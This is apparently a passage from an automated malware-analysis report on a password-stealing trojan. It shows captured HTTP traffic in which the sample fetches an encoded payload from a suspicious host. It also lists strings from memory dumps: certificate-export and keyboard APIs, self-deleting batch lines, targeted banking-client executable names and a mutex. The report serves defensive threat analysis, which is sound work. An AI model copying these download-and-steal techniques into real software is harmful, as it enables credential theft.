.videobutton-bg{margin-top:-5px}#dl_v2 .dllabel,#dl_v2 #advertad1 .dllabel,#dl_v2.dl #mkplace1 .dllabel{top:0}.slideshow h3 a{font-size:15px}@media only screen and (max-width:767px){#dl_v2 .dllabel,#dl_v2 #advertad1 .dllabel,#dl_v2.dl #mkplace1 .dllabel{display:none}}#gravitymodarticle{clear:both}</style><style type="text/css" id="cobrandadhoccss-with-inheritance"></style><script type="text/javascript" src="hXXp://portal.aolcdn.com/o.aolcdn.com/fonts/faw1kht.js.pagespeed.jm._Y1eHza8xn.js"></script>.<
<<
<<< skipped >>>
GET /images/css/al0302.enc HTTP/1.1
Accept: text/*, application/*
User-Agent: Updates downloader
Host: highclassdelhiescorts.in
Cache-Control: no-cache
HTTP/1.1 404 Not Found
Date: Sat, 24 May 2014 05:56:40 GMT
Server: Apache
Content-Length: 338
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL /images/css/al0302.enc was not found on this server.</p>.<p>Additionally, a 404 Not Found.error was encountered while trying to use an ErrorDocument to handle the request.</p>.</body></html>...
Map
The Trojan-PSW connects to the servers at the following location(s):
Strings from Dumps
Explorer.EXE_1684_rwx_021E0000_00048000:
.text
`.data
.idata
@.reloc
Invalid parameter passed to C runtime function.
>$>,>4><>
0123456789
http://www.google.com/
http://www.bing.com/
REPORT
HTTP/1.1
RegDeleteKeyExW
gdiplus.dll
GdiplusShutdown
.TJFZAIY]JD^"
?:527|:!;8
!1 (##!(
Kmv`jn`%fnfnzg,bt3crd~da4
1&,$=OJ-:&#O-
-.ynp<
'2$4>%|903
: 8? 1 !
userenv.dll
del "%s"
if exist "%s" goto d
del /F "%s"
w%fkN
t.Ht$HHt
L$Â$
m9.td
zcÁ
ntdll.dll
KERNEL32.dll
ExitWindowsEx
GetKeyboardState
MsgWaitForMultipleObjects
USER32.dll
CryptGetKeyParam
CryptImportKey
CryptDestroyKey
RegCreateKeyExW
RegCloseKey
RegQueryInfoKeyW
RegDeleteKeyW
RegOpenKeyExW
RegFlushKey
RegEnumKeyExW
ADVAPI32.dll
UrlUnescapeA
PathIsURLW
SHLWAPI.dll
ShellExecuteW
SHELL32.dll
Secur32.dll
ole32.dll
GDI32.dll
WS2_32.dll
CertDeleteCertificateFromStore
CertOpenSystemStoreW
CertCloseStore
CertEnumCertificatesInStore
CertDuplicateCertificateContext
PFXExportCertStoreEx
PFXImportCertStore
CRYPT32.dll
HttpSendRequestExA
HttpQueryInfoA
InternetCrackUrlA
HttpOpenRequestA
HttpEndRequestA
HttpAddRequestHeadersA
WININET.dll
OLEAUT32.dll
NETAPI32.dll
IPHLPAPI.DLL
VERSION.dll
msvcrt.dll
9 9$9(9,9094989
> >$>(>,>0>4>|>
00D0K0_0q0z0
:!:(:,:1:8:^:
\StringFileInfo\xx\%s
urlmon.dll
SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\%s
kernel32.dll
launchpadshell.exe
dirclt32.exe
wtng.exe
prologue.exe
pcsws.exe
fdmaster.exe
shell32.dll
cabinet.dll
Wadvapi32.dll
"%s" %s
/c "%s"
%Documents and Settings%\%current user%\Application Data
%Documents and Settings%\%current user%\Local Settings\Application Data
Global\{3D6E1BE3-083C-4088-F013-F140DE00D252}